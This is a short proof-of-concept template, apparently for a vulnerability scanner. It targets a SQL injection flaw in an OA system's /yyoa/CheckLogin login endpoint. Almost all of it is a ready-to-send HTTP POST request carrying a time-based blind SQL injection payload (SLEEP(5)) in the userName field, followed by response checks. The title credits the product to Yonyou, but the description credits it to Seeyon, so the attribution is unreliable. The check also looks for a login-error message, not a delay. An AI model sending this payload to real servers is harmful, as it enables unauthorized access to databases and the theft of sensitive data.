<DudePoc_Name>用友 OA CheckLogin 存在SQL注入漏洞</DudePoc_Name>
<DudePoc_Description>北京致远互联软件股份有限公司 OA系统 CheckLogin 存在SQL注入漏洞，攻击者可利用该漏洞获取系统敏感信息等。</DudePoc_Description>
<DudePoc_SetHeader>
POST /yyoa/CheckLogin HTTP/1.1
Host: $<AttackHost>$
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>
userName=11' AND (SELECT 6355 FROM (SELECT(SLEEP(5)))sHcE) AND 'wert'='wert&loginit12=&password=
</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>登录名错误</DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode></DudePoc_AttackCode>
